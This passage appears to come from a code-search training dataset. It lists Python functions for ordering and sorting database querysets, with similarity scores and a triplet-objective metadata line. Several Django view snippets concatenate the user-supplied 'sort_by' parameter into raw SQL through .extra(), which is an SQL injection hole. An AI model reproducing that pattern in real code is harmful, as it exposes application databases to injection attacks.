cradmin_multiselect2_ordering=models.Case(\n *whenqueries,\n default=max_index + 1,\n output_field=models.IntegerField()\n )\n )\n order_by = ['cradmin_multiselect2_ordering']\n order_by.extend(current_order_by)\n queryset = queryset.order_by(*order_by)\n return queryset", "def order_by(self, *args):\n order_clauses = self.order_clauses[:]\n related_clauses = self.related_clauses[:]\n model = self.proxy.model\n for arg in args:\n if isinstance(arg, str):\n # Convert django-style to sqlalchemy ordering column\n if arg[0] == '-':\n field = arg[1:]\n ascending = False\n else:\n field = arg\n ascending = True\n\n col = resolve_member_column(model, field, related_clauses)\n\n if ascending:\n clause = col.asc()\n else:\n clause = col.desc()\n else:\n clause = arg\n if clause not in order_clauses:\n order_clauses.append(clause)\n return self.clone(order_clauses=order_clauses,\n related_clauses=related_clauses)", "def order_by(self):\r\n if self.column.order_by is not None:\r\n order_by = self.column.order_by\r\n else:\r\n # default to using column accessor as data source sort key\r\n order_by = OrderByTuple((self.accessor, ))\r\n return order_by.opposite if self.order_by_alias.is_descending else order_by", "def post_sort(self, qs):\n return qs", "def get_queryset(self):\n\n qs = super().get_queryset() # get company specific queryset\n\n filters = dict(self.request.GET.lists()) # dictionary of lists\n\n # pull out order_by and order\n order_by = filters.pop(\"order_by\", None)\n order = filters.pop(\"order\", None)\n\n # Ordering by JSON field taken from\n # https://stackoverflow.com/questions/36641759/django-1-9-jsonfield-order-by\n # Jan 2, 2018\n\n if order_by:\n if order:\n pass\n # TODO: Figure out what can be done for ordering...\n\n else:\n qs = qs.order_by(\"-id\") # default to descending id order\n\n for exp_filter in filters:\n try:\n qs = self.FILTERS[exp_filter](qs, filters[exp_filter])\n except KeyError:\n pass\n # do nothing if not a filter\n\n return qs", "def filter_queryset(self, qs):\n qs = super(ReleaseViewSet, self).filter_queryset(qs)\n if getattr(self, 'order_queryset', False):\n return sorted(qs, key=models.Release.version_sort_key)\n return qs", "def order_queryset_by_sort_order(get, qs):\n\n def get_string_from_tuple_list(lstTuples, number):\n \"\"\"Get the string value corresponding to a number in a list of number-string tuples\"\"\"\n sBack = [tup[1] for tup in lstTuples if tup[0] == number]\n return sBack\n\n # Helper: order a queryset on field [sOrder], which is a number from a list of tuples named [sListName]\n def order_queryset_by_tuple_list(qs, sOrder, sListName):\n \"\"\"Order a queryset on field [sOrder], which is a number from a list of tuples named [sListName]\"\"\"\n\n # Get a list of tuples for this sort-order\n tpList = build_choice_list(sListName)\n # Determine sort order: ascending is default\n bReversed = False\n if (sOrder[0:1] == '-'):\n # A starting '-' sign means: descending order\n sOrder = sOrder[1:]\n bReversed = True\n\n # Order the list of tuples alphabetically\n # (NOTE: they are alphabetical from 'build_choice_list()', except for the values 0,1)\n tpList = sorted(tpList, key=operator.itemgetter(1))\n # Order by the string-values in the tuple list\n return sorted(qs, key=lambda x: get_string_from_tuple_list(tpList, getattr(x, sOrder)), reverse=bReversed)\n\n # Set the default sort order\n sOrder = 'woord' # Default sort order if nothing is specified\n # See if the form contains any sort-order information\n if ('sortOrder' in get and 
get['sortOrder'] != ''):\n # Take the user-indicated sort order\n sOrder = get['sortOrder']\n\n # The ordering method depends on the kind of field:\n # (1) text fields are ordered straightforwardly\n # (2) fields made from a choice_list need special treatment\n if (sOrder.endswith('handedness')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Handedness\")\n elif (sOrder.endswith('domhndsh') or sOrder.endswith('subhndsh')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Handshape\")\n elif (sOrder.endswith('locprim')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Location\")\n else:\n # Use straightforward ordering on field [sOrder]\n ordered = qs.order_by(sOrder)\n\n # return the ordered list\n return ordered", "def get_queryset(self):\n search_str = self.request.GET.get('search')\n col_nm = self.request.GET.get('sort_by', \"name\")\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', \"ASC\")\n self.sort_ordr=sort_order\n\n if search_str:\n search_str = self.request.GET.get('search', None)\n a = Q(name__icontains=search_str)\n b = Q(administrator__first_name__icontains = search_str)\n c = Q(administrator__last_name__icontains = search_str)\n d = Q(administrator__username__icontains = search_str)\n e = Q(types__name__icontains = search_str)\n f = Q(description__icontains = search_str)\n objects = Organization.objects.filter(a | b | c | d | e | f).distinct()\n\n else: # SORTING BY COL_NM\n if col_nm in ['name', 'description'] :\n objects = Organization.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n elif col_nm =='administrator__first_name':\n objects=Organization.objects.filter().order_by(col_nm)\n if sort_order == \"DESC\":\n objects = objects.reverse()\n else:\n objects=Organization.objects.extra(select=\n {'name':'lower(name)'}).order_by('name')\n\n\n return objects", "def get_queryset(self, request):\n queryset = self.model._default_manager.all()\n queryset = queryset.filter(user=request.user)\n ordering = self.get_ordering()\n if ordering:\n if isinstance(ordering, str):\n ordering = (ordering,)\n queryset = queryset.order_by(*ordering)\n return queryset", "def test_relatedfieldlistfilter_foreignkey_default_ordering(self):\n\n class BookAdmin(ModelAdmin):\n list_filter = (\"employee\",)\n\n self.addCleanup(setattr, Employee._meta, \"ordering\", Employee._meta.ordering)\n Employee._meta.ordering = (\"name\",)\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(self.jack.pk, \"Jack Red\"), (self.john.pk, \"John Blue\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def test_entities__Entity__setFieldOrder__2(entity_with_field):\n entity = entity_with_field\n entity.setFieldOrder(['dummy2', 'I-do-not-exist', 'dummy'])\n assert ['dummy2', 'dummy'] == entity.getFieldOrder()\n # Unknown field names are not written into storage:\n order_storage = zope.component.getUtility(IOrderStorage)\n assert (['dummy2', 'dummy'] ==\n order_storage.byNamespace(entity.order_storage_namespace))", "def test_entities__Entity__setFieldOrder__1(entity_with_field, field):\n assert [] == entity_with_field.getFieldOrder()\n entity_with_field.setFieldOrder(['dummy2', field.__name__, 'dummy'])\n assert (['dummy2', field.__name__, 'dummy'] ==\n entity_with_field.getFieldOrder())", 
"def test_relatedonlyfieldlistfilter_foreignkey_default_ordering(self):\n\n class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n self.addCleanup(setattr, Employee._meta, \"ordering\", Employee._meta.ordering)\n Employee._meta.ordering = (\"name\",)\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, \"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def _get_order_by(order, orderby, order_by_fields):\n try:\n # Find the actual database fieldnames for the keyword.\n db_fieldnames = order_by_fields[orderby]\n except KeyError:\n raise ValueError(\n \"Invalid value for 'orderby': '{}', supported values are: {}\".format(\n orderby, \", \".join(sorted(order_by_fields.keys()))\n )\n )\n\n # Default to descending for some fields, otherwise be ascending\n is_desc = (not order and orderby in ORDER_BY_DESC) or (order or \"asc\").lower() in (\n \"desc\",\n \"descending\",\n )\n\n if is_desc:\n return map(lambda name: \"-\" + name, db_fieldnames)\n else:\n return db_fieldnames", "def set_sorting_enabled(self, value):\n self.tableWidget.setSortingEnabled(value)", "def get_ordering(self, request, queryset, view):\n ordering = []\n params = get_datatables_ordering(request.query_params)\n if params:\n fields = [param.strip() for param in params.split(',')]\n ordering = self.remove_invalid_fields(queryset, fields, view, request)\n if ordering:\n return ordering\n\n # No ordering was included, or all the ordering fields were invalid\n return self.get_default_ordering(view)", "def sort(self, column, order=Qt.AscendingOrder):\n if(column == Columns.Date):\n self.sorting = Sorting.Date\n elif(column == Columns.Code):\n self.sorting = Sorting.Code\n elif(column == Columns.User):\n self.sorting = Sorting.User\n elif(column == Columns.Tags):\n self.sorting = Sorting.Priviledges\n elif(column == Columns.TimesRequested):\n self.sorting = Sorting.TimesRequested\n\n if(order == Qt.DescendingOrder):\n self.sorting |= Sorting.Reversed\n\n self._reset_view()", "def _apply_order_by_and_limit(objects, order_by=None, limit=None):\n if order_by:\n try:\n # Note: currently we sort only by the first column from the list\n order_by = order_by[0]\n order_field = order_by[\"name\"]\n order_desc = order_by.get(\"desc\", False)\n objects = sorted(\n objects,\n key=lambda obj: getattr(obj, order_field),\n reverse=order_desc,\n )\n except:\n raise BadQueryException(\"Bad query: Invalid 'order_by' parameter\")\n\n if limit:\n try:\n from_, to_ = limit\n objects = objects[from_: to_]\n except:\n raise BadQueryException(\"Bad query: Invalid 'limit' parameter.\")\n\n return objects", "def test_entities__Entity__getFieldOrder__2(entity_with_field, field):\n entity = entity_with_field\n entity.setFieldOrder([field.__name__, 'dummy'])\n assert [field.__name__, 'dummy'] == entity.getFieldOrder()", "def test_order_by(self):\n self.Person(name=\"User B\", age=40).save()\n self.Person(name=\"User A\", age=20).save()\n self.Person(name=\"User C\", age=30).save()\n\n names = [p.name for p in self.Person.objects.order_by(\"-age\")]\n assert names 
== [\"User B\", \"User C\", \"User A\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"+age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n ages = [p.age for p in self.Person.objects.order_by(\"-name\")]\n assert ages == [30, 40, 20]\n\n ages = [p.age for p in self.Person.objects.order_by()]\n assert ages == [40, 20, 30]\n\n ages = [p.age for p in self.Person.objects.order_by(\"\")]\n assert ages == [40, 20, 30]", "def queryset(self, ordering=None):\r\n qs = self.model._default_manager.get_query_set()\r\n if not ordering:\r\n ordering = self.ordering or () # otherwise we might try to *None, which is bad ;)\r\n if ordering:\r\n qs = qs.order_by(*ordering)\r\n return qs", "def sort(self, *order_fields):\n return MockSearch(\n self, self._query, self.nested_filter_calls, order_fields,\n self._script_fields\n )", "def order_by(self, aliases):\r\n accessors = []\r\n for alias in aliases:\r\n bound_column = self.table.columns[OrderBy(alias).bare]\r\n # bound_column.order_by reflects the current ordering applied to\r\n # the table. As such we need to check the current ordering on the\r\n # column and use the opposite if it doesn't match the alias prefix.\r\n if alias[0] != bound_column.order_by_alias[0]:\r\n accessors += bound_column.order_by.opposite\r\n else:\r\n accessors += bound_column.order_by\r\n if hasattr(self, \"queryset\"):\r\n translate = lambda accessor: accessor.replace(Accessor.SEPARATOR, QUERYSET_ACCESSOR_SEPARATOR)\r\n self.queryset = self.queryset.order_by(*(translate(a) for a in accessors))\r\n else:\r\n self.list.sort(key=OrderByTuple(accessors).key)", "def get_queryset(self):\n\n search_str = self.request.GET.get('search', None)\n col_nm = self.request.GET.get('sort_by', \"name\")\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', \"ASC\")\n self.sort_ordr=sort_order\n if search_str:\n a = Q(name__icontains = search_str)\n b = Q(description__icontains = search_str)\n objects = self.model.objects.filter(a | b).distinct()\n\n else:\n objects = OrganizationType.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n return objects", "def sortby(self):\n return self._sortby", "def order_query(self, query):\n\n direction = desc if self.direction == 'desc' else asc\n if self.order in inspect(self.model_class).columns.keys():\n attribute = getattr(self.model_class, self.order)\n elif self.order == 'group.name':\n attribute = func.coalesce(UserGroup.name, '')\n elif self.order == 'user.realname':\n attribute = func.coalesce(User.realname, '')\n elif self.order == 'user.username':\n attribute = func.coalesce(User.username, '')\n elif self.order == 'user.name':\n attribute = func.coalesce(User.realname, User.username, '')\n else:\n attribute = self.model_class.first_issue\n\n return query.order_by(None).order_by(direction(attribute))", "def sort_from_request(request):\n order = request.args.get('order_by')\n if order:\n key, direction = order.split(',')\n reverse = False if direction == 'ASC' else True\n return Sort(key, reverse)\n else:\n return Sort(None)", "def _sort_by_query_string_param(self, songs):\n orderable_fields_dict = {\n 'name': Lower('name'),\n 'artist': Lower('artist__name'),\n 'avgRating': 'average_rating',\n 'year': 'year'\n }\n\n order_by = self.request.query_params.get('orderBy', None)\n\n if order_by is not None 
and order_by in orderable_fields_dict:\n order_field = orderable_fields_dict[order_by]\n\n # sort in direction indicated by `direction` query string param\n # or ascending, by default\n direction = self.request.query_params.get('direction', 'asc')\n if direction == 'desc':\n if order_by == 'name' or order_by == 'artist':\n order_field = order_field.desc()\n else:\n order_field = '-' + order_field\n\n # add annotation for average_rating to sort by computed property\n if order_by == 'avgRating':\n songs = songs.annotate(\n average_rating=Avg('ratings__rating')\n )\n\n songs = songs.order_by(order_field)\n\n return songs", "def validate_sort_order(filter, main_field):\n\n # The tiebreaker fields are always in the same order, but\n # if the main sort field is one of the tiebreaker fields,\n # it's removed from the list -- there's no need to sort on\n # that field a second time.\n default_sort_fields = [\n {x: \"asc\"} for x in ['sort_author', 'sort_title', 'work_id']\n if x != main_field\n ]\n assert default_sort_fields == filter.sort_order[1:]\n return filter.sort_order[0]", "def test_relatedfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = (\"employee\",)\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(self.jack.pk, \"Jack Red\"), (self.john.pk, \"John Blue\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def _orderby_expression(self):\n return ''", "def order_by(cls, *args):\n return cls.query.order_by(*args)", "def order_by(self, column, direction=\"ASC\"):\n self._order_by += ((column, direction),)\n return self", "def add_sort(self, field_name, ascending=True):\n if not self._query_is_empty():\n self.query.AND()\n if ascending:\n logger.info(\"Sorting records by {} in ascending order.\".format(field_name))\n self.query.field(field_name.lower()).order_ascending() # lowercase for convenience\n logger.debug(\"sysparm_query contains: {q}\".format(q=self.query._query))\n else:\n logger.info(\"Sorting records by {} in descending order.\".format(field_name))\n self.query.field(field_name.lower()).order_descending()\n logger.debug(\"sysparm_query contains: {q}\".format(q=self.query._query))", "def test_relatedonlyfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, \"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def get_query_set(model_class, sort_column=\"id\", sort_descending=True, filters={}): \n 
sort_modifier = \"\"\n if sort_descending:\n sort_modifier = \"-\"\n return model_class.objects.filter(**filters).order_by(\"%s%s\"% (sort_modifier, sort_column))", "def on_combo_sort_col_names_currentIndexChanged(self, index):\n if self.ui.sort_radio_asc.isChecked():\n self.model.setSort(index, Qt.AscendingOrder)\n else:\n self.model.setSort(index, Qt.DescendingOrder)\n self.model.select()", "def order_by_alias(self):\r\n order_by = OrderBy((self.table.order_by or {}).get(self.name, self.name))\r\n order_by.next = order_by.opposite if self.is_ordered else order_by\r\n return order_by", "def update_order_property_setter(self, has_custom, fieldname):\n\t\tproperty_name = f\"{fieldname}_order\"\n\t\tif has_custom:\n\t\t\t# save the order of the actions and links\n\t\t\tself.make_property_setter(\n\t\t\t\tproperty_name, json.dumps([d.name for d in self.get(fieldname)]), \"Small Text\"\n\t\t\t)\n\t\telse:\n\t\t\tfrappe.db.delete(\"Property Setter\", dict(property=property_name, doc_type=self.doc_type))", "def set_sort_order(self, sort_order):\n\n\t\tif sort_order is not None and not isinstance(sort_order, str):\n\t\t\traise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: sort_order EXPECTED TYPE: str', None, None)\n\t\t\n\t\tself.__sort_order = sort_order\n\t\tself.__key_modified['sort_order'] = 1", "def changeOrder(self):\n order = self.orderSpinBox.value()\n nfilter = int(str(self.filterComboBox.currentText()))\n if order > nfilter - 2:\n order = nfilter - 2\n if order < 1:\n order = 1\n self.orderSpinBox.setValue(order)\n self.order = order", "def order_by(self, *colnames):\r\n if len(colnames) == 0:\r\n clone = copy.deepcopy(self)\r\n clone._order = []\r\n return clone\r\n\r\n conditions = []\r\n for colname in colnames:\r\n conditions.append('\"{}\" {}'.format(*self._get_ordering_condition(colname)))\r\n\r\n clone = copy.deepcopy(self)\r\n clone._order.extend(conditions)\r\n return clone", "def resolve_orderby(self, orderby: Optional[Union[List[str], str]]) -> List[OrderBy]:\n validated: List[OrderBy] = []\n\n if orderby is None:\n return validated\n\n if isinstance(orderby, str):\n if not orderby:\n return validated\n\n orderby = [orderby]\n\n orderby_columns: List[str] = orderby if orderby else []\n\n resolved_orderby: Union[str, SelectType, None]\n for orderby in orderby_columns:\n bare_orderby = orderby.lstrip(\"-\")\n bare_orderby = self.tag_to_prefixed_map.get(bare_orderby, bare_orderby)\n try:\n # Allow ordering equations with the calculated alias (ie. equation[0])\n if is_equation_alias(bare_orderby):\n resolved_orderby = bare_orderby\n # Allow ordering equations directly with the raw alias (ie. 
equation|a + b)\n elif is_equation(bare_orderby):\n resolved_orderby = self.equation_alias_map[strip_equation(bare_orderby)]\n bare_orderby = resolved_orderby.alias\n else:\n resolved_orderby = self.resolve_column(bare_orderby)\n except (NotImplementedError, IncompatibleMetricsQuery):\n resolved_orderby = None\n\n direction = Direction.DESC if orderby.startswith(\"-\") else Direction.ASC\n\n if fields.is_function(bare_orderby) and (\n isinstance(resolved_orderby, Function)\n or isinstance(resolved_orderby, CurriedFunction)\n or isinstance(resolved_orderby, AliasedExpression)\n ):\n bare_orderby = resolved_orderby.alias\n\n for selected_column in self.columns:\n if isinstance(selected_column, Column) and selected_column == resolved_orderby:\n validated.append(OrderBy(selected_column, direction))\n break\n elif (\n isinstance(selected_column, AliasedExpression)\n and selected_column.alias == bare_orderby\n ):\n if bare_orderby in self.orderby_converter:\n validated.append(self.orderby_converter[bare_orderby](direction))\n break\n # We cannot directly order by an `AliasedExpression`.\n # Instead, we order by the column inside.\n validated.append(OrderBy(selected_column.exp, direction))\n break\n\n elif (\n isinstance(selected_column, CurriedFunction)\n and selected_column.alias == bare_orderby\n ):\n if bare_orderby in self.orderby_converter:\n validated.append(self.orderby_converter[bare_orderby](direction))\n validated.append(OrderBy(selected_column, direction))\n break\n\n if len(validated) == len(orderby_columns):\n return validated\n\n # TODO: This is no longer true, can order by fields that aren't selected, keeping\n # for now so we're consistent with the existing functionality\n raise InvalidSearchQuery(\"Cannot sort by a field that is not selected.\")", "def get_paginate_by(self, queryset):\n return self.request.GET.get('paginate_by', self.paginate_by)", "def get_queryset(self):\n search_str = self.request.GET.get('search', None)\n col_nm = self.request.GET.get('sort_by', 'title')\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', 'ASC')\n self.sort_ordr=sort_order\n if search_str:\n search_str = self.request.GET.get('search', None)\n a = Q(title__icontains = search_str)\n b = Q(description__icontains = search_str)\n objects = Designation.objects.filter(a | b).distinct()\n else: # SORTING BY COL_NM\n objects = Designation.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n return objects", "def get_default_paginate_by(self, queryset):\n return self.paginate_by", "def __init__(\n self,\n queryset,\n per_page=25,\n ordering=\"pk\",\n allow_count=False,\n allow_empty_first_page=True,\n orphans=0,\n ):\n self.queryset = queryset\n self.per_page = int(per_page)\n self.ordering = ordering\n self.allow_count = allow_count\n\n field = ordering.replace(\"-\", \"\")\n self._reverse_ordering = field if ordering[0] == \"-\" else \"-{0}\".format(ordering)\n self._field = field", "def get_queryset(self):\n queryset = super(viewsets.ModelViewSet, self).get_queryset().order_by('first_name')\n\n if self.request.GET.get('q', None):\n return queryset.filter(username__icontains=self.request.GET['q'])\n return queryset", "def sort_field():\n _id = request.form['_id']\n old_index = request.form['old_index']\n new_index = request.form['new_index']\n data, code, message = FIELD_SERVICE.sort_field(_id, old_index, new_index)\n return __result(data, code, message)", "def sort(self, field='word', 
order=None):\n self.data = list(self.sorted(field, order))", "def order_by(self, *orderings):\n return OrderedQuery(self, orderings)", "def ordered(self):\n if isinstance(self, EmptyQuerySet):\n return True\n if self.query.extra_order_by or self.query.order_by:\n return True\n elif (\n self.query.default_ordering\n and self.query.get_meta().ordering\n and\n # A default ordering doesn't affect GROUP BY queries.\n not self.query.group_by\n ):\n return True\n else:\n return False", "def order_by(self, *fields):\n doc = []\n for field in fields:\n if field.startswith('-'):\n doc.append((field.strip('-'), pymongo.DESCENDING))\n else:\n doc.append((field, pymongo.ASCENDING))\n return self.sort(doc)", "def pre_filter(self, qs):\n return qs", "def test_shelflistitem_view_orderby(order_by, api_settings, shelflist_solr_env,\n get_shelflist_urls, api_client):\n sl_urls = get_shelflist_urls(shelflist_solr_env.records['shelflistitem'])\n test_url = '{}?orderBy={}'.format(sl_urls.values()[0], order_by)\n response = api_client.get(test_url)\n assert response.status_code == 400\n assert 'not a valid field for ordering' in response.data['detail']", "def sort_on(self):\n if \"sortOn\" in self._prop_dict:\n return self._prop_dict[\"sortOn\"]\n else:\n return None", "def list(self, request, *args, **kwargs):\n self.order_queryset = True\n if 'ordering' in request.query_params.keys():\n self.order_queryset = False\n return super(ReleaseViewSet, self).list(request, *args, **kwargs)", "def setSearchFieldnames(self, fieldnames):\n self._search_fieldnames = fieldnames", "def sort_order(self, sort_order):\n\n self._sort_order = sort_order", "def queryset(self, request):\n qs = self.model.all_objects.get_query_set()\n ordering = self.ordering or ()\n if ordering:\n qs = qs.order_by(*ordering)\n return qs", "def setFieldNames(self, model, lyr): \n #get the fields\n fields = lyr.pendingFields()\n position = 0\n \n #set column names\n for field in fields:\n model.setHorizontalHeaderItem(position, QStandardItem(field.name()))\n position+=1", "def get_queryset(self, request):\n querys = self.model.all_objects.get_queryset()\n ordering = self.get_ordering(request)\n if ordering:\n querys = querys.order_by(*ordering)\n return querys", "def default_sort_column(self, default_sort_column):\n\n self._default_sort_column = default_sort_column", "def get_sort_query(self, kind, order, is_number):\n pass", "def testSortNoDbAscending(self):\n self.request.GET['sort'] = \"custom\"\n self.datagrid.load_state()\n self.assertEqual(self.datagrid.sort_list, [\"custom\"])\n self.assertEqual(len(self.datagrid.rows), self.datagrid.paginate_by)\n self.assertEqual(self.datagrid.rows[0]['object'].name, \"Group 04\")\n self.assertEqual(self.datagrid.rows[1]['object'].name, \"Group 08\")\n self.assertEqual(self.datagrid.rows[2]['object'].name, \"Group 12\")\n\n # Exercise the code paths when rendering\n self.datagrid.render_listview()", "def order_by_as_sql(self):\n return comma_join([\n '%s DESC' % field[1:] if isinstance(field, str) and field[0] == '-' else str(field)\n for field in self._order_by\n ])", "def order_by(self, list_or_name):\n if not isinstance(list_or_name, basestring):\n for c in list_or_name:\n self.order_by(c)\n else:\n self._orderby_conds.append(list_or_name)\n\n return self" ]
[ "0.7341898", "0.6805477", "0.6581681", "0.6385461", "0.6315338", "0.6252756", "0.6159823", "0.6090766", "0.5956584", "0.5951964", "0.59386057", "0.59089255", "0.5759275", "0.57582235", "0.5749629", "0.57229424", "0.5717913", "0.5713295", "0.5711421", "0.5647316", "0.56422055", "0.5628972", "0.5614769", "0.5580601", "0.55733776", "0.55547047", "0.553233", "0.5531154", "0.55197537", "0.5511838", "0.54860467", "0.546445", "0.542131", "0.5418024", "0.54073393", "0.5401253", "0.5371489", "0.53640515", "0.5361596", "0.53579396", "0.5351", "0.5332443", "0.53310454", "0.53293097", "0.5325503", "0.53149694", "0.53113145", "0.53030163", "0.5302289", "0.5290726", "0.5260061", "0.52572787", "0.52543426", "0.5249301", "0.5222232", "0.5200427", "0.5191958", "0.51868385", "0.51580137", "0.51320595", "0.513167", "0.5104893", "0.50984687", "0.5095851", "0.50854176", "0.5078093", "0.50720453", "0.507147", "0.5069176", "0.5066822", "0.5014096", "0.50123554", "0.50003916", "0.49757993", "0.49698162", "0.4958311", "0.4955699", "0.49396747", "0.49281523", "0.49274027", "0.49263138", "0.4920943", "0.49131167", "0.48960656", "0.48881856", "0.4877852", "0.48678052", "0.48620927", "0.4860523", "0.48460498", "0.48270464", "0.48247853", "0.48241735", "0.48169374", "0.48094258", "0.47954646", "0.47767633", "0.47754154", "0.4773829", "0.47728968" ]
0.7116057
1
Set the `order_by_field` on the filterset and ensure that the field name is respected.
def test_ordering_with_overridden_field_name_and_descending(self): class F(FilterSet): class Meta: model = User fields = ['username', 'status'] order_by = ['status', '-status'] order_by_field = 'order' f = F().form self.assertNotIn('o', f.fields) self.assertIn('order', f.fields) self.assertEqual(f.fields['order'].choices, [('status', 'Status'), ('-status', 'Status (descending)')])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_ordering_with_overridden_field_name(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status']\n order_by_field = 'order'\n\n f = F({'order': 'status'}, queryset=self.qs)\n self.assertQuerysetEqual(\n f.qs, ['carl', 'alex', 'jacob', 'aaron'], lambda o: o.username)", "def test_ordering_with_overridden_field_name(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status']\n order_by_field = 'order'\n\n f = F().form\n self.assertNotIn('o', f.fields)\n self.assertIn('order', f.fields)\n self.assertEqual(f.fields['order'].choices, [('status', 'Status')])", "def order_by(self, order_by):\n\n self._order_by = order_by", "def set_sort_by(self, sort_by):\n\n\t\tif sort_by is not None and not isinstance(sort_by, str):\n\t\t\traise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: sort_by EXPECTED TYPE: str', None, None)\n\t\t\n\t\tself.__sort_by = sort_by\n\t\tself.__key_modified['sort_by'] = 1", "def user_order_by(self, field):\n # Get ordering model.\n model_label = order.utils.resolve_labels('.'.join(\\\n [self.model._meta.app_label, self.model._meta.object_name]))\n orderitem_set = getattr(self.model, \\\n order.utils.resolve_order_item_related_set_name(model_label))\n order_model = orderitem_set.related.model\n\n # Resolve ordering model table name.\n db_table = order_model._meta.db_table\n\n # Add ordering field as extra queryset fields.\n pk_name = self.model._meta.pk.attname\n\n # If we have a descending query remove '-' from field name when quering.\n sanitized_field = field.lstrip('-')\n\n extra_select = {\n sanitized_field: '(SELECT %s from %s WHERE item_id=%s.%s)' % \\\n (sanitized_field, db_table, self.model._meta.db_table, pk_name)\n }\n\n # Use original field name when ordering to allow for descending.\n return self.extra(select=extra_select).all().order_by(field)", "def order_queryset(self, queryset):\n if ordering := self.request.query_params.get(\"ordering\"):\n order_by = []\n regex = re.compile(r\"-?annotations__(?P<field_id>\\d+)\")\n fields = [field.strip() for field in ordering.split(\",\")]\n for match in filter(None, map(regex.match, fields)):\n field_id = match.group(\"field_id\")\n annotation_value = AnnotationValue.objects.filter(\n entity_id=OuterRef(\"pk\"), field_id=field_id\n ).values(\"_value__value\")\n annotate = {f\"_order_{field_id}\": Subquery(annotation_value)}\n queryset = queryset.annotate(**annotate)\n sign = \"-\" if match.string.startswith(\"-\") else \"\"\n order_by.append(f\"{sign}_order_{field_id}\")\n if order_by:\n queryset = queryset.order_by(*order_by)\n return queryset", "def order_by(self, *field_names):\n qs = copy(self)\n qs._order_by = field_names\n return qs", "def order_by(self, field_paths, order=None):\n raise NotImplementedError(\"This should have been implemented.\")", "def order_by(self, *fields):\n self.query = self.query.sort(self._parse_order_spec(fields))\n return self", "def sortby(self, sortby):\n self._sortby = sortby", "def sort_queryset(\n queryset: QuerySet, sort_by: SortInputObjectType, reversed: bool\n) -> QuerySet:\n sorting_direction = sort_by.direction\n if reversed:\n sorting_direction = REVERSED_DIRECTION[sorting_direction]\n\n sorting_field = sort_by.field\n sorting_attribute = getattr(sort_by, \"attribute_id\", None)\n\n if sorting_field is not None and sorting_attribute is not None:\n raise GraphQLError(\n \"You must provide either `field` or `attributeId` to sort the products.\"\n )\n elif 
